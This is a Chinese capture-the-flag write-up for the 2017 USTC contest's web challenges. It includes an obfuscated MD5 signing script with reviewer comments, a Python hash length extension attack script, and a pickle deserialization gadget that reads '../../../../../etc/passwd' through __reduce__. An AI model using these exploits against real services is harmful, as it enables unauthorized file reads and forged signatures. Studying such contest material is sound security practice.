Scu_laji

2017ustc ctf

web 题 writeup

简单验证

首先,看到其中有一个被注释的登录表单,然后进入 admin.php 看一下, 观察 cookies, 根据经验判断应该是 base64 编码,然后换成 admin 的 base64,发包即可

黑客猜奇偶

第一题比较简单,后端未校验前端 str 的长度,直接把前端改成空字符串,看后端传过来的 md5 值直接发包即可。

ajax 本辣鸡没做出来。

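// Front-end of the "黑客猜奇偶" challenge as captured by the author: a minified MD5 /
// HMAC-MD5 library (the IV 0x67452301.., the F/G/H/I round functions, the per-round
// constants and the 0x36/0x5c HMAC pads all match RFC 1321 / RFC 2104), followed by the
// page script that signs the user's guess before sending it. Every identifier string
// (property names, element ids, the salt) is assembled from single-character lookups
// into the scrambled tables _a2/_b2/_c2 through the intermediate strings _a/_b/_c, so
// the names given in the comments below are inferred from string lengths and call
// patterns, not decoded.
// NOTE(review): the "[email protected]" fragments inside _a2 and _b2 are an extraction
// artifact (an email-obfuscation rewrite of the original characters); the characters
// they replaced are not recoverable from this page, and every index into those tables
// past that point is shifted, so this listing cannot run as captured.
// The lost line break before `!function` (a syntax error in the captured text) is
// restored here with an explicit semicolon.
const _a2 = "、Ai[({)&uohdpw4【gBI”:¥M j‘Ea7'0|2>】G#…[email protected]?C.m。;l:]Lx;“-ven/b—S\\15%`=8t^9!*k,3y<c!~f)(,rH}s?$",
  _b2 = "A?>[email protected]:\\o)w$”-'a)I]1:~M】hle/8063G=【.n!y2p<vti,E d{kB`,;}…x#uSs%—5(b4。r(;“CmTH|?j¥9c^*[‘L&!、f7",
  _c2 = ":i:C0ay)”>{8,!f&@`\\TH#b—3;B-/w4}[jS】$h<v!【。|k?‘]2¥^srdg5'…mA?7, ~1.E)cnI6eu(G“%*LMt、x9ol=p;(",
  // Intermediate lookup strings; the code below indexes these, never the tables directly.
  _a = _c2[18] + _c2[72] + _a2[11] + _b2[58] + _b2[41] + _a2[43] + _a2[5] + _b2[78] + _c2[8] + _b2[25] + _b2[10] + _c2[29] + _c2[78] + _c2[22] + _c2[63] + _a2[12] + _b2[32] + _c2[41] + _a2[63] + _c2[85] + _b2[35] + _a2[68] + _b2[4] + _b2[49] + _b2[84] + _c2[0] + _b2[30] + _b2[20] + _b2[64] + _b2[83] + _c2[26] + _c2[5] + _a2[37] + _c2[9] + _a2[35] + _a2[28] + _c2[68] + _c2[54] + _c2[49] + _b2[37] + _a2[85] + _a2[32] + _b2[77] + _b2[69] + _a2[30] + _b2[88] + _c2[83] + _b2[70] + _a2[89] + _c2[71] + _b2[56] + _a2[52] + _c2[42] + _b2[23] + _b2[85] + _c2[67] + _b2[73] + _b2[72] + _a2[72] + _c2[23] + _c2[1] + _c2[34] + _c2[17] + _c2[28] + _b2[40] + _a2[14] + _a2[53] + _b2[0] + _b2[76] + _b2[54] + _a2[7] + _a2[38] + _a2[6] + _c2[45] + _b2[24] + _a2[86] + _c2[55] + _b2[86] + _a2[9] + _a2[34] + _c2[20] + _c2[47] + _b2[57] + _b2[42] + _c2[2] + _a2[70] + _b2[13] + _b2[12] + _c2[69] + _a2[75] + _c2[14] + _b2[21],
  _b = _c2[39] + _a2[51] + _a2[52] + _a2[29] + _b2[61] + _a2[84] + _b2[45] + _b2[65] + _c2[62] + _c2[73] + _a2[85] + _b2[76] + _c2[42] + _b2[0] + _a2[5] + _b2[85] + _b2[66] + _c2[18] + _a2[82] + _c2[6] + _c2[9] + _b2[78] + _c2[68] + _c2[88] + _b2[23] + _c2[36] + _c2[7] + _b2[35] + _b2[33] + _a2[80] + _c2[79] + _b2[74] + _b2[34] + _a2[4] + _a2[87] + _a2[48] + _a2[36] + _b2[81] + _c2[85] + _c2[29] + _b2[87] + _c2[58] + _b2[49] + _c2[86] + _a2[11] + _b2[16] + _a2[53] + _a2[37] + _b2[91] + _a2[40] + _a2[61] + _a2[64] + _c2[60] + _c2[8] + _a2[39] + _a2[27] + _b2[38] + _b2[27] + _a2[63] + _b2[62] + _b2[89] + _b2[40] + _b2[19] + _a2[70] + _c2[49] + _a2[12] + _a2[76] + _b2[21] + _b2[3] + _b2[26] + _b2[84] + _a2[2] + _c2[51] + _a2[23] + _b2[70] + _c2[82] + _a2[47] + _c2[35] + _c2[4] + _b2[50] + _b2[12] + _a2[8] + _a2[42] + _b2[31] + _a2[49] + _b2[86] + _b2[36] + _b2[54] + _a2[81] + _b2[51] + _c2[45] + _b2[68],
  _c = _a2[66] + _c2[38] + _c2[59] + _b2[35] + _c2[43] + _c2[69] + _a2[33] + _a2[36] + _c2[47] + _c2[31] + _b2[10] + _a2[8] + _c2[75] + _a2[9] + _c2[3] + _a2[62] + _a2[63] + _a2[15] + _b2[44] + _c2[68] + _b2[12] + _b2[67] + _a2[2] + _b2[48] + _b2[63] + _b2[31] + _a2[43] + _b2[38] + _b2[20] + _c2[19] + _c2[60] + _b2[70] + _c2[67] + _b2[3] + _c2[82] + _b2[85] + _c2[14] + _a2[40] + _a2[86] + _c2[83] + _a2[48] + _a2[30] + _b2[4] + _b2[86] + _b2[55] + _b2[71] + _b2[23] + _b2[19] + _c2[85] + _c2[26] + _c2[20] + _a2[72] + _a2[6] + _b2[61] + _b2[26] + _b2[14] + _b2[84] + _c2[35] + _b2[27] + _c2[81] + _a2[28] + _c2[84] + _c2[49] + _c2[24] + _b2[49] + _a2[44] + _b2[87] + _b2[9] + _c2[56] + _b2[83] + _a2[85] + _c2[71] + _b2[37] + _b2[53] + _b2[65] + _c2[34] + _a2[47] + _b2[60] + _b2[32] + _a2[90] + _b2[25] + _a2[4] + _a2[55] + _b2[88] + _c2[63] + _b2[62] + _a2[12] + _b2[66] + _b2[82] + _c2[33] + _a2[19] + _a2[11];
// Minified MD5 library. `_` receives `this` from the call site, i.e. the global object
// when this runs as a classic browser script.
! function(_) {
  // 32-bit add: the 16-bit halves are summed separately so the carry survives JS double math.
  function c(_, c) {
    var b = (65535 & _) + (65535 & c),
      a = (_ >> 16) + (c >> 16) + (b >> 16)
    return a << 16 | 65535 & b
  }
  // 32-bit rotate left by c bits.
  function b(_, c) {
    return _ << c | _ >>> 32 - c
  }
  // Common MD5 step: b + rotl(a + q + x + t, s).
  function a(_, a, n, t, r, u) {
    return c(b(c(c(a, _), c(t, u)), r), n)
  }
  // Round functions F, G, H, I: (b & c) | (~b & d), (b & d) | (c & ~d), b ^ c ^ d, c ^ (b | ~d).
  function n(_, c, b, n, t, r, u) {
    return a(c & b | ~c & n, _, c, t, r, u)
  }
  function t(_, c, b, n, t, r, u) {
    return a(c & n | b & ~n, _, c, t, r, u)
  }
  function r(_, c, b, n, t, r, u) {
    return a(c ^ b ^ n, _, c, t, r, u)
  }
  function u(_, c, b, n, t, r, u) {
    return a(b ^ (c | ~n), _, c, t, r, u)
  }
  // MD5 compression over a little-endian 32-bit word array `_`; `b` is the message length
  // in bits. Sets the 0x80 padding bit and the length word, then runs the four 16-step
  // rounds per 512-bit block. The 6-char array property in the loop bound is presumably "length".
  function o(_, b) {
    const a = _b,
      o = _c
    _[b >> 5] |= 128 << b % 32, _[(b + 64 >>> 9 << 4) + 14] = b
    // Initial state A, B, C, D = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476.
    var e, f, i, s, d, v = 1732584193,
      m = -271733879,
      p = -1732584194,
      h = 271733878
    for (e = 0; e < _[a[76] + a[9] + a[27] + a[68] + o[34] + o[46]]; e += 16) f = v, i = m, s = p, d = h, v = n(v, m, p, h, _[e], 7, -680876936), h = n(h, v, m, p, _[e + 1], 12, -389564586), p = n(p, h, v, m, _[e + 2], 17, 606105819), m = n(m, p, h, v, _[e + 3], 22, -1044525330), v = n(v, m, p, h, _[e + 4], 7, -176418897), h = n(h, v, m, p, _[e + 5], 12, 1200080426), p = n(p, h, v, m, _[e + 6], 17, -1473231341), m = n(m, p, h, v, _[e + 7], 22, -45705983), v = n(v, m, p, h, _[e + 8], 7, 1770035416), h = n(h, v, m, p, _[e + 9], 12, -1958414417), p = n(p, h, v, m, _[e + 10], 17, -42063), m = n(m, p, h, v, _[e + 11], 22, -1990404162), v = n(v, m, p, h, _[e + 12], 7, 1804603682), h = n(h, v, m, p, _[e + 13], 12, -40341101), p = n(p, h, v, m, _[e + 14], 17, -1502002290), m = n(m, p, h, v, _[e + 15], 22, 1236535329), v = t(v, m, p, h, _[e + 1], 5, -165796510), h = t(h, v, m, p, _[e + 6], 9, -1069501632), p = t(p, h, v, m, _[e + 11], 14, 643717713), m = t(m, p, h, v, _[e], 20, -373897302), v = t(v, m, p, h, _[e + 5], 5, -701558691), h = t(h, v, m, p, _[e + 10], 9, 38016083), p = t(p, h, v, m, _[e + 15], 14, -660478335), m = t(m, p, h, v, _[e + 4], 20, -405537848), v = t(v, m, p, h, _[e + 9], 5, 568446438), h = t(h, v, m, p, _[e + 14], 9, -1019803690), p = t(p, h, v, m, _[e + 3], 14, -187363961), m = t(m, p, h, v, _[e + 8], 20, 1163531501), v = t(v, m, p, h, _[e + 13], 5, -1444681467), h = t(h, v, m, p, _[e + 2], 9, -51403784), p = t(p, h, v, m, _[e + 7], 14, 1735328473), m = t(m, p, h, v, _[e + 12], 20, -1926607734), v = r(v, m, p, h, _[e + 5], 4, -378558), h = r(h, v, m, p, _[e + 8], 11, -2022574463), p = r(p, h, v, m, _[e + 11], 16, 1839030562), m = r(m, p, h, v, _[e + 14], 23, -35309556), v = r(v, m, p, h, _[e + 1], 4, -1530992060), h = r(h, v, m, p, _[e + 4], 11, 1272893353), p = r(p, h, v, m, _[e + 7], 16, -155497632), m = r(m, p, h, v, _[e + 10], 23, -1094730640), v = r(v, m, p, h, _[e + 13], 4, 681279174), h = r(h, v, m, p, _[e], 11, -358537222), p = r(p, h, v, m, _[e + 3], 16, -722521979), m = r(m, p, h, v, _[e + 6], 23, 76029189), v = r(v, m, p, h, _[e + 9], 4, -640364487), h = r(h, v, m, p, _[e + 12], 11, -421815835), p = r(p, h, v, m, _[e + 15], 16, 530742520), m = r(m, p, h, v, _[e + 2], 23, -995338651), v = u(v, m, p, h, _[e], 6, -198630844), h = u(h, v, m, p, _[e + 7], 10, 1126891415), p = u(p, h, v, m, _[e + 14], 15, -1416354905), m = u(m, p, h, v, _[e + 5], 21, -57434055), v = u(v, m, p, h, _[e + 12], 6, 1700485571), h = u(h, v, m, p, _[e + 3], 10, -1894986606), p = u(p, h, v, m, _[e + 10], 15, -1051523), m = u(m, p, h, v, _[e + 1], 21, -2054922799), v = u(v, m, p, h, _[e + 8], 6, 1873313359), h = u(h, v, m, p, _[e + 15], 10, -30611744), p = u(p, h, v, m, _[e + 6], 15, -1560198380), m = u(m, p, h, v, _[e + 13], 21, 1309151649), v = u(v, m, p, h, _[e + 4], 6, -145523070), h = u(h, v, m, p, _[e + 11], 10, -1120210379), p = u(p, h, v, m, _[e + 2], 15, 718787259), m = u(m, p, h, v, _[e + 9], 21, -343485551), v = c(v, f), m = c(m, i), p = c(p, s), h = c(h, d)
    return [v, m, p, h]
  }
  // Word array -> binary (one byte per char) string. The 12-char String method is
  // presumably fromCharCode; the 6-char property read on `_` is presumably length.
  function e(_) {
    const c = _b,
      b = _c,
      a = _a
    var n, t = "",
      r = 32 * _[a[74] + a[9] + c[27] + a[37] + c[75] + c[24]]
    for (n = 0; r > n; n += 8) t += String[c[18] + b[38] + b[13] + b[65] + b[14] + a[53] + c[55] + c[91] + b[14] + c[43] + c[44] + c[9]](_[n >> 5] >>> n % 32 & 255)
    return t
  }
  // Binary string -> zero-filled little-endian word array. The 10-char string method
  // is presumably charCodeAt.
  function f(_) {
    const c = _c,
      b = _a,
      a = _b
    var n, t = []
    for (t[(_[a[76] + c[80] + a[27] + a[68] + c[34] + a[24]] >> 2) - 1] = void 0, n = 0; n < t[a[76] + a[9] + b[20] + c[33] + b[83] + b[53]]; n += 1) t[n] = 0
    var r = 8 * _[b[74] + b[9] + a[27] + c[33] + b[83] + a[24]]
    for (n = 0; r > n; n += 8) t[n >> 5] |= (255 & _[b[88] + c[46] + a[55] + a[91] + a[82] + a[43] + b[2] + c[80] + b[67] + a[75]](n / 8)) << n % 32
    return t
  }
  // Raw MD5 of a binary string.
  function i(_) {
    const c = _b,
      b = _c,
      a = _a
    return e(o(f(_), 8 * _[c[76] + a[9] + a[20] + a[37] + b[34] + c[24]]))
  }
  // HMAC-MD5 of binary string `c` under key `_`: keys longer than one block (16 words)
  // are hashed first; 909522486 / 1549556828 are the 0x36363636 / 0x5c5c5c5c pads;
  // 640 = 512 + 128 bits. The 6-char array method is presumably concat.
  function s(_, c) {
    const b = _a,
      a = _b,
      n = _c
    var t, r, u = f(_),
      i = [],
      s = []
    for (i[15] = s[15] = void 0, u[n[76] + a[9] + b[20] + a[68] + b[83] + b[53]] > 16 && (u = o(u, 8 * _[b[74] + n[80] + b[20] + n[33] + a[75] + b[53]])), t = 0; 16 > t; t += 1) i[t] = 909522486 ^ u[t], s[t] = 1549556828 ^ u[t]
    return r = o(i[b[88] + a[43] + a[27] + a[37] + a[55] + a[75]](f(c)), 512 + 8 * c[a[76] + a[9] + b[20] + a[68] + b[83] + a[24]]), e(o(s[a[37] + b[78] + b[20] + b[88] + a[55] + a[75]](r), 640))
  }
  // Binary string -> hex; `r` is a 16-char digit table built from the lookup strings.
  // The 10-/6-char string methods are presumably charCodeAt / charAt.
  function d(_) {
    const c = _a,
      b = _c,
      a = _b
    var n, t, r = a[78] + a[58] + a[56] + a[66] + c[65] + a[51] + a[49] + c[35] + c[21] + c[19] + b[55] + a[7] + b[5] + a[44] + b[80] + b[36],
      u = ""
    for (t = 0; t < _[b[76] + a[9] + c[20] + a[68] + c[83] + b[46]]; t += 1) n = _[c[88] + b[46] + c[31] + c[75] + c[57] + c[78] + a[44] + a[9] + a[13] + c[83]](t), u += r[a[37] + c[53] + c[31] + b[38] + c[67] + a[75]](n >>> 4 & 15) + r[b[5] + b[46] + a[55] + b[38] + b[2] + c[83]](15 & n)
    return u
  }
  // UTF-8 encode a JS string (the unescape/encodeURIComponent trick).
  function v(_) {
    return unescape(encodeURIComponent(_))
  }
  // Raw MD5 of UTF-8 input.
  function m(_) {
    return i(v(_))
  }
  // Hex MD5 of UTF-8 input.
  function p(_) {
    return d(m(_))
  }
  // Raw HMAC-MD5 of UTF-8 input under UTF-8 key `_`.
  function h(_, c) {
    return s(v(_), v(c))
  }
  // Hex HMAC-MD5 of UTF-8 input under UTF-8 key `_`.
  function l(_, c) {
    return d(h(_, c))
  }
  // Public entry g(string, key, raw): a key selects HMAC, a truthy `raw` selects binary output.
  function g(_, c, b) {
    return c ? b ? h(c, _) : l(c, _) : b ? m(_) : p(_)
  }
  // Export: AMD define, then CommonJS module.exports, else a 3-char global property
  // (the page script below calls it as `md5`).
  typeof define === _c[36] + _b[81] + _a[20] + _c[5] + _c[34] + _c[22] + _c[13] + _c[3] && define[_b[55] + _b[41] + _b[44]] ? define(function() {
    return g
  }) : typeof module === _c[13] + _b[7] + _b[21] + _a[9] + _b[37] + _a[83] && module[_a[9] + _a[50] + _b[65] + _b[43] + _c[38] + _b[75] + _c[77]] ? module[_b[9] + _b[1] + _c[86] + _b[43] + _c[38] + _b[75] + _b[72]] = g : _[_b[41] + _c[91] + _a[76]] = g
}(this),
// Page script: filters and signs the guess client-side, then submits it over XHR.
function() {
  "use strict"
  // Input filter: drops every character matched by a RegExp assembled from the lookup
  // strings (walking the input one char at a time via a 6-char method, presumably
  // substr, and a 7-char method, presumably replace), then removes five fixed
  // substrings. None of the patterns are recoverable from this listing.
  function _(_) {
    const c = _a,
      b = _b,
      a = _c
    for (var n = RegExp(a[56] + c[12] + b[80] + c[87] + c[62] + a[28] + a[83] + b[54] + a[7] + a[10] + a[88] + a[66] + c[29] + b[33] + c[72] + c[16] + a[4] + c[6] + a[9] + c[86] + b[35] + b[74] + c[86] + a[18] + b[17] + c[24] + b[17] + a[8] + a[26] + c[64] + c[33] + a[54] + c[42] + a[28] + c[58] + b[54] + a[7] + b[64] + b[47] + c[32] + b[40] + c[29] + b[5] + c[36] + b[59] + a[85] + c[68] + c[6] + b[87] + a[17] + b[77] + b[15] + a[73] + b[62] + b[53] + c[66] + a[68] + a[21] + c[40] + b[60] + a[79] + c[81]), t = "", r = 0; r < _[a[76] + a[80] + a[3] + b[68] + b[75] + a[46]]; r++) t += _[a[77] + b[81] + a[74] + b[72] + a[34] + a[38]](r, 1)[c[75] + c[9] + c[15] + b[76] + c[31] + a[5] + b[9]](n, "")
    return t = t[c[75] + a[80] + b[65] + b[76] + a[55] + c[88] + b[9]](c[48] + a[80] + a[76] + b[9] + b[37] + b[75], ""), t = t[b[91] + c[9] + c[15] + c[74] + c[31] + a[5] + a[80]](a[84], ""), t = t[b[91] + c[9] + b[65] + c[74] + a[55] + c[88] + b[9]](a[11] + c[20] + b[71] + c[78] + b[27], ""), t = t[b[91] + a[80] + a[86] + a[76] + c[31] + c[88] + b[9]](c[11] + a[46] + c[9] + a[38] + c[9], ""), t = t[b[91] + c[9] + c[15] + b[76] + b[55] + b[37] + c[9]](a[86] + a[55] + c[48] + a[77] + c[11] + a[13] + b[91] + c[2], "")
  }
  // Signature = md5(prefix + filter(guess) + suffix), where prefix `t` and suffix `r`
  // are 20-char constants built from the lookup strings. Everything needed to compute
  // it ships in this script, so the signature gives the server no integrity guarantee:
  // any client can recompute it for arbitrary input.
  // NOTE(review): `console.log(t);` is the only semicolon-terminated statement in the
  // minified code and looks hand-inserted while reversing; it prints the decoded prefix.
  function c(c) {
    const b = _a,
      a = _b,
      n = _c
    var t = n[46] + a[55] + b[88] + b[23] + a[9] + n[38] + a[68] + a[55] + n[65] + a[9] + b[18] + n[24] + n[41] + n[60] + n[27] + b[35] + n[48] + b[35] + a[16] + a[16],
      r = b[18] + n[24] + b[44] + b[35] + n[27] + a[48] + n[48] + a[48] + n[87] + a[16] + b[53] + n[55] + n[5] + b[23] + b[9] + b[75] + b[37] + a[55] + n[65] + b[9]
    console.log(t);
    return md5(t + _(c) + r)
  }
  // Submit: request = guess + 1-char separator + signature, sent with a 3-char method
  // (presumably GET) to an 11-char path + request, async (`!0`). On readyState 4 /
  // status 200 the 12-char response property (presumably responseText) is written into
  // an element through a 9-char property (presumably innerHTML). Writing a server
  // response into innerHTML renders any markup the server echoes back; textContent
  // would be the safe sink.
  function b(_) {
    const b = _c,
      a = _a,
      n = _b
    var t, r = _ + a[68] + c(_)
    t = new XMLHttpRequest, t[b[13] + n[27] + b[38] + b[80] + a[31] + a[2] + b[72] + a[48] + b[34] + b[55] + a[83] + b[80] + n[37] + a[53] + n[55] + a[20] + b[33] + a[9]] = function() {
      4 == this[b[38] + n[9] + b[55] + b[91] + n[19] + b[75] + b[34] + n[55] + a[83] + a[9]] && 200 == this[a[48] + a[83] + a[31] + n[75] + a[3] + a[48]] && (document[b[33] + a[9] + a[83] + b[32] + n[76] + b[80] + a[56] + a[9] + n[27] + n[75] + b[49] + n[19] + n[45] + b[91]](a[75] + b[80] + n[72] + b[86] + n[43] + b[3] + b[77] + n[9])[n[71] + a[20] + a[20] + a[9] + b[38] + n[34] + a[71] + b[59] + a[77]] = this[b[38] + b[80] + n[72] + b[86] + b[13] + b[3] + a[48] + b[80] + n[31] + a[9] + b[61] + b[34]])
    }, t[n[43] + b[86] + b[80] + n[27]](a[34] + n[6] + a[71], a[31] + n[21] + a[31] + n[1] + b[26] + a[15] + n[24] + n[65] + n[52] + b[77] + a[16] + r, !0), t[n[72] + b[80] + a[20] + b[91]]()
  }
  // document.<14-char>(<6-char id>).<7-char> = handler — presumably
  // getElementById(...).onclick; the handler reads the element's 5-char property
  // (presumably value) and submits it through b().
  document[_a[37] + _c[80] + _a[83] + _a[55] + _a[74] + _c[80] + _b[41] + _b[9] + _a[20] + _c[34] + _b[79] + _b[19] + _a[49] + _a[2]](_a[60] + _b[27] + _b[65] + _c[11] + _b[75] + _a[18])[_a[78] + _c[3] + _a[23] + _c[80] + _b[19] + _b[81] + _a[15]] = function() {
    b(document[_b[68] + _c[80] + _a[83] + _a[55] + _b[76] + _c[80] + _c[65] + _c[80] + _c[3] + _b[75] + _c[49] + _c[72] + _c[71] + _b[44]](_b[71] + _b[27] + _c[86] + _b[81] + _b[75] + _c[16])[_b[0] + _a[31] + _a[74] + _c[11] + _b[9]])
  }
}()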

前端源码在此,听大佬们说把签名算法逆出来就好。

黑客猜奇偶升级版

hash_长度扩展攻击

import requests
from bs4 import BeautifulSoup
import subprocess
import time
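# Author's note: POST once first so the page structure stays the same.
se = requests.session()
header = {"Content-Type": "application/x-www-form-urlencoded"}
# Forged "text" field: the 0x80 byte, zero padding and an 8-byte little-endian bit
# length (0x100 = 256 bits = 32 bytes, i.e. the 32-byte secret given to hash_extender
# below plus an empty text), followed by the appended string "I_aM_L01i".
info = '''text=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00I%5faM%5fL01i&submit=%E6%8F%90%E4%BA%A4'''
choice = 1
r = ''
# Traffic goes through a local intercepting proxy so each round can be inspected.
proxies = {"http": "http://127.0.0.1:8080"}
# Loop body reconstructed: the captured listing had lost its indentation, and the
# module-level `global r` after `r = ''` was a SyntaxError, so it is dropped.
for _ in range(31):
    data = info + '&choice=' + str(choice)
    r = se.post("http://hack.lug.ustc.edu.cn/dynamic/4/", data=data, headers=header, proxies=proxies)
    # The signature is taken from the last <code> element of the response.
    sig = BeautifulSoup(r.text, "lxml").select("html body div p code")[-1]
    sign = sig.get_text()
    # argv list instead of shell=True + string concatenation: `sign` comes straight
    # from the HTTP response and must never be interpolated into a shell command line.
    with subprocess.Popen(
        ["./hash_extender", "-d", "", "--secret", "32", "--append", "I_aM_L01i",
         "--signature", sign, "--format", "md5", "--table", "--out-data-format=html"],
        stdout=subprocess.PIPE,
    ) as p:
        # The author takes the 8th whitespace-separated field of the --table output
        # as the extended signature.
        new_sig = p.stdout.read().strip().split(b' ')[7]
    new_sig = int(new_sig.upper(), 16)
    # The next guess is the parity of the new signature value.
    choice = new_sig % 2
    print(new_sig)
    print(choice)
    print(r.text)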
# print (r.text, se.cookies)

poc 如上。

hash_extender

Hideandseek

这道题坑了我最久。emmm

先放 poc 吧。

import pickle
import base64
from flask import Flask
from handies import file_contents, safe_unpickle
import flag
from app import Credential,CredentialProxy
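class exp(object):
    """Pickle gadget: on unpickling, the callable returned by ``__reduce__`` is
    invoked with the given arguments in the unpickling process."""

    def __reduce__(self):
        # pickle stores the callable as a module + name reference only; it is
        # resolved and called on the unpickling side, which is why the module
        # name must match the target environment exactly ("handies" here).
        obj_module = __import__("handies")
        func = getattr(obj_module, "file_contents")
        return (func, ("../../../../../etc/passwd",))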
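e = exp()
s = pickle.dumps(e)
print(s)
# The original printed eval(repr(s)) here; evaluating a bytes repr is a no-op
# round trip with identical output, so print the value itself instead of eval.
print(s)
print(base64.b64encode(s))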

我不会告诉你我因为搞错了模块的名字弄了两天的。

这里__reduce__的用法可以在标准文档中查到

大概意思就是说，这个 __reduce__ 应该返回一个元组。这个元组决定反序列化时执行的代码：第一个元素是一个 callable，第二个元素是传给它的参数元组。

除了这些东西，我想分享下我的思路。首先，我尝试的是 pickle Credential、CredentialProxy 这两个，通过程序的逻辑来实现获取 flag。显然，这种思路是错误的。然后，我尝试使用 file_contents 来获取 flag，很不幸，我弄错了模块名字。emmmm 接着，我尝试 pickle flag.flag，虽说这是个字符串，但是我们也可以序列化它而不读取到其中本地的值。

这里说的是，所有的内建方法和用户定义的 func，在 pickle 时仅仅会被按名字引用（name reference）；简单来说，就是我们可以序列化它，但它执行什么代码取决于反序列化它的环境。

import flag
# A function pickles as a module/name reference only; nothing local is read.
e = flag.try_login
s = pickle.dumps(e)
for line in (s, base64.b64encode(s)):
    print(line)

输出如上，只需要把 try_login 改成 flag，就可以正常地输出了。（如果本题修改反序列化过滤方式的话，直接读取 flag.flag 也不失为一种方式。）

自己的 git 服务器

直接扔师傅的博客地址就逃。

cve-2017-8386